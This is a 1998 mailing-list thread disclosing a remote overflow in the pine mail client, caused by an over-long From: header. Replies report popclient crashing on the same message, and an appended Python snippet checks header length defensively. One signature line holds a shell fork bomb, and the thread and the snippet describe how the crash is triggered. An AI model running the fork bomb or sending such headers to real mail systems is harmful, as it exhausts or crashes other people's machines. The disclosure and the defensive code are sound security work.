Date: Wed, 17 Jun 1998 16:57:28 +0200
From: Michal Zalewski
Subject: another remote pine vulnerability

Recently I found a silly remote overflow in pine. It's so simple there's no need to describe it:

From: Michal Zalewski

...and any attempt at reading this mail will cause:

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()

It can be exploited to gain access to remote/local accounts. Fortunately, overly long headers are destroyed by sendmail during prescan (maybe there's a way to split the long line using encoding tricks):

Jun 17 16:49:24 genome sendmail[689]: QAA00689: SYSERR(root): prescan: token too long

But other mail daemons aren't so strict - it works.

_______________________________________________________________________
Michal Zalewski [lcamtuf@boss.staszic.waw.pl] <= finger for pub PGP key
To iterate is human, to recurse divine [P. Deutsch]
[echo "\$0&\$0">_;chmod +x _;./_] <=------=> [tel +48 (0) 22 813 25 86]

---------------------------------------------------------------------------

Date: Thu, 18 Jun 1998 14:46:00 -0400
From: "Phillip R. Jaenke"
Subject: Re: another remote pine vulnerability

Also, attempting to so much as download *THIS* email I'm quoting here will cause a panic in 'popclient.' pine is fine, but popclient can't retrieve email past this message.

> RETR 9
+OK 3897 octets.
(56 lines of message content)
> DELE 1094795585
doPOP3: cleanUp: Bad file descriptor

The only way to get rid of the offending message is by hand. I'd say we've stumbled onto something that could be rather painful.

--Phillip R. Jaenke (prj@nls.net - InterNIC: PRJ5)
Head Geek, Linux@Comdex Project - http://comdex.linuxos.org/
TheGuyInCharge(tm), Ketyra Designs, Inc.
"For every step I take, I find somebody stepping on my heels." --anonymous
"That's IT! I'm gonna slap Dr.Watson with a malpractice suit!!" --Keihra
! I reserve the right to bill spammers for my time and disk space !
---------------------------------------------------------------------------

Date: Thu, 18 Jun 1998 23:29:09 +0200
From: frank@SUN01.CCII.UNIPI.IT
Subject: Re: another remote pine vulnerability

On Thu, 18 Jun 1998, Phillip R. Jaenke wrote:
>
> Also, attempting to so much as download *THIS* email I'm quoting here will
> cause a panic in 'popclient.' pine is fine, but popclient can't retrieve
> email past this message.

I just downloaded this message with fetchmail, so I assume it isn't affected by the same bug as popclient.

afrodite[40]:~> fetchmail -V
This is fetchmail release 3.8 pl 0

regards.

Francesco Messineo frank@ing.unipi.it
PGP public key: http://sirius.ccii.unipi.it/~frank/public.asc
KeyID 1024/2937E1A5
Key fingerprint = 5B 41 DC 7C 06 90 29 CA 39 05 59 F5 B3 CC 9A 9D

---------------------------------------------------------------------------
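The first two messages in this thread report the same over-long header from two sides: pine faults at address 0x41414141 and popclient issues "DELE 1094795585". The added example below (not code from any of the posters, nor from pine, popclient or sendmail) shows that these two numbers are the same value, and implements a defender-side prescan check, loosely modelled on the sendmail "token too long" rejection quoted above, that flags header fields carrying a single token longer than a limit before a client parses them. The limit of 256, the helper names and the sample message are constructed for this example.

```python
import re

# Assumed limit for one header token; loosely modelled on sendmail's
# prescan rejection quoted in the thread, not taken from sendmail itself.
MAX_HEADER_TOKEN = 256


def fault_address_as_int(hex_addr):
    """Interpret a fault address such as '41414141' as the integer a
    client would see if the same bytes landed in a numeric variable."""
    return int(hex_addr, 16)


def unfold_headers(raw):
    """Return (name, value) pairs for the header block of a raw message,
    joining RFC 822 continuation lines onto their field."""
    head = raw.split(b"\r\n\r\n", 1)[0].replace(b"\r\n", b"\n")
    fields = []
    for line in head.split(b"\n"):
        if line[:1] in (b" ", b"\t") and fields:
            name, value = fields[-1]
            fields[-1] = (name, value + line.decode("latin-1"))
        elif b":" in line:
            name, _, value = line.partition(b":")
            fields.append((name.decode("latin-1").strip(),
                           value.decode("latin-1").strip()))
    return fields


def prescan(raw, limit=MAX_HEADER_TOKEN):
    """Return the names of header fields whose longest single token
    exceeds `limit`; an empty list means the headers pass the check."""
    bad = []
    for name, value in unfold_headers(raw):
        tokens = re.split(r"[\s,;<>()]+", value)
        if max(len(tok) for tok in tokens) > limit:
            bad.append(name)
    return bad


# Constructed sample: a From: header padded with a run of 'A' bytes (0x41),
# consistent with the 0x41414141 fault address reported in the thread.
SAMPLE = (b"From: " + b"A" * 4000 + b"\r\n"
          b"Subject: another remote pine vulnerability\r\n"
          b"\r\n"
          b"body\r\n")

if __name__ == "__main__":
    print("0x41414141 ==", fault_address_as_int("41414141"))  # 1094795585
    print("over-long header fields:", prescan(SAMPLE))        # ['From']
```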